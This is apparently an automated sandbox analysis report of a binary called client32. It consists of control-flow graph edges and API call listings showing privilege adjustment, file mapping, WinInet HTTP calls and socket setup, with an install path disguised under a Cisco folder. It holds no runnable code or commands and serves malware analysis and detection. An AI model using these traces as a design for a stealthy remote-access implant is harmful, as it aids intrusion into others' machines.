101967 11029345 GetProcAddress 101967->101973 101969 11029372 GetLastError 101969->101973 101970 1113e8f0 std::locale::_Init 261 API calls 101970->101973 101971 1115f3b5 23 API calls _free 101971->101973 101972 11029395 GetProcAddress 101972->101973 101973->101962 101973->101964 101973->101965 101973->101967 101973->101969 101973->101970 101973->101971 101973->101972 101978 110296ba std::ios_base::_Tidy 101973->101978 101981 11080b10 IsDBCSLeadByte 101973->101981 101988 1102949f GetProcAddress 101973->101988 101989 110294cb GetProcAddress 101973->101989 101990 110294de InternetConnectA 101973->101990 101996 11029543 GetProcAddress 101973->101996 101997 11029504 GetProcAddress 101973->101997 102003 11029591 GetProcAddress 101973->102003 102005 110295c2 GetLastError 101973->102005 102008 11029615 GetLastError 101973->102008 102009 1102962c GetDesktopWindow 101973->102009 101981->101973 101988->101973 101989->101990 101990->101973 101996->101973 101997->101973 102003->101973 102005->101973 102008->101973 102008->102009 102009->101973 102012->101843 102013->101866 102023->101842 102024->101846 102030 110cf1bc 102029->102030 102031 110cf1d7 102030->102031 102032 110cf1c0 102030->102032 102045 110cdeb0 102031->102045 102074 110290f0 261 API calls 2 library calls 102032->102074 102039 110cf20e 102039->101942 102039->101943 102040 110cf1f7 102075 110290f0 261 API calls 2 library calls 102040->102075 102046 110cdeb9 102045->102046 102047 110cdebd 102046->102047 102048 110cded4 102046->102048 102076 110290f0 261 API calls 2 library calls 102047->102076 102050 110cded1 102048->102050 102051 110cdf08 102048->102051 102050->102048 102077 110290f0 261 API calls 2 library calls 102050->102077 102053 110cdf05 102051->102053 102054 110cdf26 102051->102054 102053->102051 102078 110290f0 261 API calls 2 library calls 102053->102078 102057 110cedc0 102054->102057 102058 110cedce 102057->102058 102059 110cede9 102058->102059 102060 110cedd2 102058->102060 102062 110cede6 102059->102062 
102064 110cee1c 102059->102064 102079 110290f0 261 API calls 2 library calls 102060->102079 102062->102059 102080 110290f0 261 API calls 2 library calls 102062->102080 102063 110cee90 102063->102039 102063->102040 102064->102063 102064->102064 102081 110ce710 102064->102081 102068 110cee4f _memmove 102068->102063 102071 110cee79 102068->102071 102082 110ce71d 102081->102082 102083 110ce738 102082->102083 102084 110ce721 102082->102084 102086 110ce756 102083->102086 102087 110ce735 102083->102087 102099 110290f0 261 API calls 2 library calls 102084->102099 102094 110ce180 102086->102094 102087->102083 102100 110290f0 261 API calls 2 library calls 102087->102100 102092 110ce650 264 API calls 2 library calls 102092->102068 102095 110ce18b 102094->102095 102096 110ce1a2 102094->102096 102101 110290f0 261 API calls 2 library calls 102095->102101 102096->102068 102096->102092 102127 1110c420 std::locale::_Init 261 API calls 102126->102127 102128 110ffe0d 102127->102128 102129 110ffe40 102128->102129 102134 110ffcc0 102128->102134 102129->101882 102131 110ffe2d 102131->101882 102132->101886 102133->101888 102141 1115bd20 102134->102141 102137 110ffd27 std::locale::_Init 102139 110ffd60 GetStockObject RegisterClassA 102137->102139 102138 110ffd91 CreateWindowExA 102138->102131 102139->102138 102140 110ffd8a 102139->102140 102140->102138 102144 1115ab80 GlobalAddAtomA 102141->102144 102145 1115abb5 GetLastError wsprintfA 102144->102145 102146 1115ac07 GlobalAddAtomA GlobalAddAtomA 102144->102146 102153 110290f0 261 API calls 2 library calls 102145->102153 102148 1115e4d1 __setlocale_nolock 5 API calls 102146->102148 102149 110ffcf1 GlobalAddAtomA 102148->102149 102149->102137 102149->102138 102155 1109dcd6 102154->102155 102156 1109dc40 GetTokenInformation 102154->102156 102158 1115e4d1 __setlocale_nolock 5 API calls 102155->102158 102157 1109dc62 __crtGetStringTypeA_stat 102156->102157 102157->102155 102160 1109dc68 GetTokenInformation 102157->102160 102159 1109dce8 
102158->102159 102159->101744 102160->102155 102161 1109dc7a 102160->102161 102162 1109dcaf EqualSid 102161->102162 102163 1109dc83 AllocateAndInitializeSid 102161->102163 102162->102155 102164 1109dcbd 102162->102164 102163->102155 102163->102162 102165 1115e4d1 __setlocale_nolock 5 API calls 102164->102165 102166 1109dcd2 102165->102166 102166->101744 102168 1116021d 102167->102168 102169 1116020b 102167->102169 102182 111601ac 75 API calls 2 library calls 102168->102182 102169->101772 102171 11160227 102171->101772 102173 11080d0d 102172->102173 102174 11080d12 102172->102174 102183 11080a30 IsDBCSLeadByte 102173->102183 102176 11080d1b 102174->102176 102180 11080d33 102174->102180 102184 1115ff54 81 API calls 3 library calls 102176->102184 102178 11080d2c 102178->101761 102179 11161f66 81 API calls std::locale::_Init 102179->102180 102180->102179 102181 11080d39 102180->102181 102181->101761 102182->102171 102183->102174 102184->102178 102185->101618 102186->101612 102187->101625 102188->101629 102189->101628 102190->101629 102192 111610dd 102191->102192 102194 111610f6 102191->102194 102192->102194 102224 1116c9b8 8 API calls 102192->102224 102195 11161d95 102194->102195 102225 1116fe36 LeaveCriticalSection 102195->102225 102197 11161ce2 102198 11161a47 102197->102198 102199 11161a70 102198->102199 102205 11161a8b 102198->102205 102216->101638 102217->101643 102224->102194 102225->102197 102353 1113f146 102352->102353 102354 1113f203 102353->102354 102355 11080b10 IsDBCSLeadByte 102353->102355 102354->101667 102356 1113f16b 102355->102356 102357 11080b10 IsDBCSLeadByte 102356->102357 102358 1113f19b _memmove 102357->102358 102358->101667 102372 68b41dfc 102373 68b41e16 102372->102373 102374 68b41e0b 102372->102374 102377 68b4c84a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 102373->102377 102374->102373 102376 68b4c845 102377->102376 102378 11112b00 102396 11141990 102378->102396 102381 11112b45 102382 
1106ae60 294 API calls 105946->105950 105951 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 105946->105951 105948->105946 105952 1106e810 332 API calls 3 library calls 105948->105952 105953 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 105948->105953 105950->105946 105951->105946 105952->105948 105953->105948 105954 1102ff34 105955 1113f0c0 263 API calls 105954->105955 105956 1102ff42 105955->105956 105957 1113f220 82 API calls 105956->105957 105958 1102ff85 105957->105958 105959 1102ff9a 105958->105959 105960 11080c50 82 API calls 105958->105960 105961 110eaed0 8 API calls 105959->105961 105960->105959 105962 1102ffc5 105961->105962 105963 1103000c 105962->105963 106005 110eaf80 77 API calls 2 library calls 105962->106005 105966 1113f220 82 API calls 105963->105966 105965 1102ffda 106006 110eaf80 77 API calls 2 library calls 105965->106006 105968 11030021 105966->105968 105970 1110c420 std::locale::_Init 261 API calls 105968->105970 105969 1102fff0 105969->105963 105971 111429e0 19 API calls 105969->105971 105972 11030030 105970->105972 105971->105963 105973 11030051 105972->105973 105974 110879a0 264 API calls 105972->105974 105975 11089840 263 API calls 105973->105975 105974->105973 105976 11030064 OpenMutexA 105975->105976 105977 11030083 CreateMutexA 105976->105977 105978 1103016c CloseHandle 105976->105978 105979 110300a5 105977->105979 105998 11089940 105978->105998 105981 1110c420 std::locale::_Init 261 API calls 105979->105981 105985 110300ba 105981->105985 105982 11030182 105983 1115e4d1 __setlocale_nolock 5 API calls 105982->105983 105984 11030aff 105983->105984 106007 11015e10 LoadLibraryA 105985->106007 105987 110300ef 105988 11030103 GetProcAddress 105987->105988 105989 11030119 105987->105989 105988->105989 105990 1103011d SetLastError 105988->105990 105991 11027e10 47 API calls 105989->105991 105990->105989 105992 1103012a 105991->105992 106008 11009320 423 
API calls std::locale::_Init 105992->106008 105994 11030139 105995 11030142 WaitForSingleObject 105994->105995 105995->105995 105996 11030154 CloseHandle 105995->105996 105996->105978 105997 11030165 FreeLibrary 105996->105997 105997->105978 105999 110899e7 105998->105999 106002 1108997a std::ios_base::_Tidy 105998->106002 106000 110899ee DeleteCriticalSection 105999->106000 106009 11139f90 106000->106009 106001 1108998e CloseHandle 106001->106002 106002->105999 106002->106001 106004 11089a14 std::ios_base::_Tidy 106004->105982 106005->105965 106006->105969 106007->105987 106008->105994 106012 11139fa4 106009->106012 106010 11139fa8 106010->106004 106012->106010 106013 11139bb0 35 API calls 2 library calls 106012->106013 106013->106012 106014 68915ae6 106015 68915af1 106014->106015 106016 68915af6 106014->106016 106028 6891f28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 106015->106028 106020 689159f0 106016->106020 106019 68915b04 106021 689159fc ___FrameUnwindToState 106020->106021 106024 68915a49 ___DllMainCRTStartup 106021->106024 106027 68915a99 ___FrameUnwindToState 106021->106027 106029 6891588c 106021->106029 106023 68915a79 106025 6891588c __CRT_INIT@12 149 API calls 106023->106025 106023->106027 106024->106023 106026 6891588c __CRT_INIT@12 149 API calls 106024->106026 106024->106027 106025->106027 106026->106023 106027->106019 106028->106016 106030 68915898 ___FrameUnwindToState 106029->106030 106031 689158a0 106030->106031 106032 6891591a 106030->106032 106082 6891607f HeapCreate 106031->106082 106034 68915920 106032->106034 106035 6891597b 106032->106035 106041 6891593e 106034->106041 106049 689158a9 ___FrameUnwindToState 106034->106049 106101 68915e35 66 API calls _doexit 106034->106101 106036 68915980 106035->106036 106037 689159d9 106035->106037 106083 68916da9 TlsGetValue 106036->106083 106037->106049 106107 689170ad 79 API calls __freefls@4 106037->106107 106038 689158a5 106040 689158b0 
106038->106040 106038->106049 106092 68917127 86 API calls 5 library calls 106040->106092 106046 68915952 106041->106046 106102 68919b09 67 API calls _free 106041->106102 106105 68915965 70 API calls __mtterm 106046->106105 106049->106024 106052 689158b5 __RTC_Initialize 106053 689158b9 106052->106053 106058 689158c5 GetCommandLineA 106052->106058 106093 6891609d HeapDestroy 106053->106093 106054 68915948 106103 68916dfa 70 API calls _free 106054->106103 106055 6891599d DecodePointer 106063 689159b2 106055->106063 106094 6891f016 71 API calls 2 library calls 106058->106094 106059 689158be 106059->106049 106060 6891594d 106104 6891609d HeapDestroy 106060->106104 106065 689159b6 106063->106065 106066 689159cd 106063->106066 106064 689158d5 106095 689198c4 73 API calls __calloc_crt 106064->106095 106106 68916e37 66 API calls 4 library calls 106065->106106 106067 68911bfd _free 66 API calls 106066->106067 106067->106049 106070 689158df 106072 689158e3 106070->106072 106097 6891ef5b 95 API calls 3 library calls 106070->106097 106071 689159bd GetCurrentThreadId 106071->106049 106096 68916dfa 70 API calls _free 106072->106096 106075 689158ef 106076 68915903 106075->106076 106098 6891ecd4 94 API calls 6 library calls 106075->106098 106081 68915908 106076->106081 106100 68919b09 67 API calls _free 106076->106100 106079 689158f8 106079->106076 106099 68915c32 77 API calls 4 library calls 106079->106099 106081->106049 106082->106038 106084 68915985 106083->106084 106085 68916dbe DecodePointer TlsSetValue 106083->106085 106086 6891d3f5 106084->106086 106085->106084 106088 6891d3fe 106086->106088 106087 6891a082 __calloc_crt 65 API calls 106087->106088 106088->106087 106089 68915991 106088->106089 106090 6891d41c Sleep 106088->106090 106089->106049 106089->106055 106091 6891d431 106090->106091 106091->106088 106091->106089 106092->106052 106093->106059 106094->106064 106095->106070 106096->106053 106097->106075 106098->106079 106099->106076 106100->106072 106101->106041 
106102->106054 106103->106060 106104->106046 106105->106049 106106->106071 106107->106049 106108 1106043a 106109 1105fda0 266 API calls 106108->106109 106110 1106044c 106109->106110 106111 11060488 106110->106111 106115 1105fda0 266 API calls 106110->106115 106117 1105fbf0 37 API calls std::ios_base::_Tidy 106111->106117 106113 1106049a 106114 1115e4d1 __setlocale_nolock 5 API calls 106113->106114 106116 110604b2 106114->106116 106115->106110 106117->106113

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,A0A8B03E,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                          • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                          • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                          • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,A0A8B03E,00080000,00000000,00000000), ref: 1109D535
                                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
                                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 1109D570
                                                                                                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
                                                                                                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
                                                                                                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
                                                                                                                                        • CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D64D
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D676
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D683
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D6A0
                                                                                                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D6E9
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D6F6
                                                                                                                                          • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
                                                                                                                                          • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D7EB
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D7F8
                                                                                                                                        • _memset.LIBCMT ref: 1109D810
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1109D818
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1109D8C4
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
                                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D934
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D93B
                                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D979
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
                                                                                                                                        • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109DA35
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                                        • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                        • API String ID: 3291243470-2792520954
                                                                                                                                        • Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                        • Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
                                                                                                                                        • Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                        • Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                          • Part of subcall function 688F2A90: wsprintfA.USER32 ref: 688F2B05
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 68907057
                                                                                                                                        • InitializeCriticalSection.KERNEL32(6893B898), ref: 689070DF
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 689070EF
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68907115
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6890713B
                                                                                                                                        • WSAStartup.WSOCK32(00000101,6893B91A), ref: 68907167
                                                                                                                                        • _malloc.LIBCMT ref: 689071A3
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _memset.LIBCMT ref: 689071D3
                                                                                                                                        • _calloc.LIBCMT ref: 68907214
                                                                                                                                        • _malloc.LIBCMT ref: 6890728B
                                                                                                                                        • _memset.LIBCMT ref: 689072C1
                                                                                                                                        • _malloc.LIBCMT ref: 689072CD
                                                                                                                                        • _memset.LIBCMT ref: 68907303
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68907361
                                                                                                                                        • CreateThread.KERNEL32(00000000,00004000,68906BA0,00000000,00000000,6893BACC), ref: 6890737E
                                                                                                                                        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 689073AC
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\Support\,00000104), ref: 68907430
                                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 689074B0
                                                                                                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 689074C0
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 68907566
                                                                                                                                        • timeBeginPeriod.WINMM(00000001), ref: 68907573
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                                        • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$305090$C:\Users\user\AppData\Roaming\Cisco\Support\$C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                                        • API String ID: 3160247386-123846317
                                                                                                                                        • Opcode ID: 5c7f180f713cabddc1d034d81c28a02f89e5e25c8dea5ebc011a0fb5b6c07217
                                                                                                                                        • Instruction ID: 69d9dd3be34a192283faf954134301041b0feda1eaacefe08ebbc92e87aa7e8f
                                                                                                                                        • Opcode Fuzzy Hash: 5c7f180f713cabddc1d034d81c28a02f89e5e25c8dea5ebc011a0fb5b6c07217
                                                                                                                                        • Instruction Fuzzy Hash: FCD1D4B5948734BFDB309FAC9C85A1E7AF8EB4A35CBC04829F559D7241E731E8408B91

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll,A0A8B03E,762323A0,?,00000000), ref: 11029265
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029313
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
                                                                                                                                        • GetLastError.KERNEL32 ref: 11029372
                                                                                                                                        • _free.LIBCMT ref: 1102937E
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
                                                                                                                                        • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029404
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029411
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102941B
                                                                                                                                        • _free.LIBCMT ref: 11029425
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 110294BE
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
                                                                                                                                        • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029523
                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 110297D0
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029839
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 1102984A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free$ConnectHeapLoadOpen
                                                                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                        • API String ID: 3391987931-913974648
                                                                                                                                        • Opcode ID: a36c1f7c4d09e11b0cf3eaec22f6cfdc2bb90b64aa9f30ea6b191bd58b9bb04b
                                                                                                                                        • Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
                                                                                                                                        • Opcode Fuzzy Hash: a36c1f7c4d09e11b0cf3eaec22f6cfdc2bb90b64aa9f30ea6b191bd58b9bb04b
                                                                                                                                        • Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,688F8F91,00000000,00000000,6893B8DA,?,00000080), ref: 688F5852
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,00000000,00000000), ref: 688FAA11
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAA58
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAA68
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAA94
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 688FAB0B
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 688FAB4E
                                                                                                                                        • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 688FAB5A
                                                                                                                                        • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAB8E
                                                                                                                                        • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 688FABB1
                                                                                                                                        • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 688FABE3
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC18
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC21
                                                                                                                                        • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC29
                                                                                                                                        • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC65
                                                                                                                                        • WSASetBlockingHook.WSOCK32(688F63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC76
                                                                                                                                        • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC8F
                                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC96
                                                                                                                                        • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAC9C
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FACFD
                                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD04
                                                                                                                                        • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD0A
                                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD45
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 688FAD4F
                                                                                                                                        • InitializeCriticalSection.KERNEL32(-6893CB4A), ref: 688FADE6
                                                                                                                                          • Part of subcall function 688F8FB0: _memset.LIBCMT ref: 688F8FE4
                                                                                                                                          • Part of subcall function 688F8FB0: getsockname.WSOCK32(?,?,00000010,?,025E2EF8,?), ref: 688F9005
                                                                                                                                        • getsockname.WSOCK32(00000000,?,?), ref: 688FAE4B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FAE60
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688FAE6C
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 688FAE7A
